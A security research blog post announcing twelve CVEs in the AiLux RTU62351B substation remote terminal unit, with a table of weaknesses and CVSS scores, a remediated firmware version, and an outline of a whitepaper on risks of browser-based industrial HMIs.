Nozomi Networks Labs Announces Vulnerabilities Affecting the AiLux RTU62351B and the “Codename I11USION” Whitepaper

Nozomi Networks Labs Announces Vulnerabilities Affecting the AiLux RTU62351B and the “Codename I11USION” Whitepaper

In Q4 2023, Nozomi Networks Labs participated in the No Hat security conference hosted in Bergamo, Italy, presenting the results of novel research on browser-based human machine interfaces (HMIs) named “Codename I11USION”.

This security research effort by Nozomi Networks Labs spotlighted the top eleven risks linked with the adoption of a web-centric, browser-based HMI approach and the consequential impacts within controlled OT environments.

This blog post marks the completion of our CVE reservation process, allowing us to publish the vulnerabilities in the AiLux RTU62351B, the last device in our series. Having concluded this final step, we are thrilled to also release to the public the white paper associated with our research, comprehensively describing all results and insights learned from our investigation.

In this blog, we detail the vulnerabilities found in the RTU62351B and share a brief outline of what to expect in the related white paper.

An HMI being used inside an industrial control system.

Twelve Vulnerabilities Affect the AiLux RTU62351B

In the past few years, Nozomi Networks Labs has conducted extensive research on the security of browser-based HMIs, analyzing devices from high-profile vendors such as Siemens, SEL, Phoenix Contact, and Bosch Rexroth.

AiLux is an emerging brand in Italy for substation automation systems, producing devices that are employed in plants of major energy players such as Enel or Eni. AiLux produces the RTU62351B, a Remote Terminal Unit (RTU) with embedded HMI that is designed for the automation and control of electrical substations. The device runs a customized, Linux-based operating system that exposes a web-based HMI. Physical operators can monitor and interact with it through the touch panel and a Chromium-based browser. Remote control and monitoring through the Ethernet network are also available.

The AiLux RTU62351B, with embedded HMI.

While analyzing the device, Nozomi Networks Labs discovered twelve vulnerabilities, listed below:

CVE IDCWECVSS v3.1 Base ScoreCVSS v3.1 Vector
CVE-2023-5456Use of Hard-coded Credentials (CWE-798)8.1CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2023-5457Product Released in Non-Release Configuration (CWE-1269)7.5CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2023-45591Heap-based Buffer Overflow (CWE-122)7.5CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE-2023-45592Execution with Unnecessary Privileges (CWE-250)6.8CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2023-45593Protection Mechanism Failure (CWE-693)6.8CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2023-45594Files or Directories Accessible to External Parties (CWE-552)6.8CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2023-45595Unrestricted Upload of File with Dangerous Type (CWE-434)5.9CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
CVE-2023-45596Missing Authorization (CWE-862)5.3CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE-2023-45597Improper Neutralization of Formula Elements in a CSV File (CWE-1236)5.9CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
CVE-2023-45598Missing Authorization (CWE-862)5.3CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE-2023-45599Reliance on File Name or Extension of Externally-Supplied File (CWE-646)5.5CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L
CVE-2023-45600Insufficient Session Expiration (CWE-613)5.6CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

The impacts posed by these vulnerabilities are diverse, with one particularly notable chain: by exploiting weaknesses in the browser configuration, an unauthenticated physical attacker could have accessed sensitive resources on the device, altered its configuration, and even achieved execution of arbitrary commands as root. For more details about this chain, please refer to our white paper, which provides step-by-step explanations of how an attacker could have abused the vulnerabilities found.

All CVEs have been successfully remediated in the AiLux imx6 bundle version imx6_1.0.7-2. We strongly recommend that asset owners apply the update to avoid misuse of the device by malicious threat actors.

Codename I11USION: the White Paper

The newly released white paper from Nozomi Networks Labs provides in-depth overview of our research into the changing landscape of HMIs. As these interfaces begin to utilize web technologies more extensively, the transition to browser-based HMIs brings considerable advantages to operational technology sectors. Yet, this shift also carries new security risks, which unfortunately vendors often overlook.

Nozomi Networks Labs conducted research on five browser-based HMIs from leading vendors to identify and detail eleven major security risks that are inherent to these systems. This includes both commonly known web security issues like Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), as well as more obscure risks such as the mismanagement of file operations and the remote exploitation of privileges granted to physical operators. These vulnerabilities provide potential attack vectors through which malicious actors could gain complete control over the HMI, and, consequently, the controlled industrial processes.

Exploitation of CVE-2023-45594 and 45593, one of the chains covered in the white paper.

Through several case studies, the white paper vividly demonstrates how these vulnerabilities can be exploited to disrupt operations and manipulate HMI displays, thereby concealing illicit activities. Such scenarios underscore the serious threats these weaknesses pose to both physical safety and operational integrity.

The paper concludes by offering essential insights and practical measures that end-users, vendors, and the broader community can implement to mitigate the risks associated with browser-based HMIs, ultimately enhancing security in industrial environments.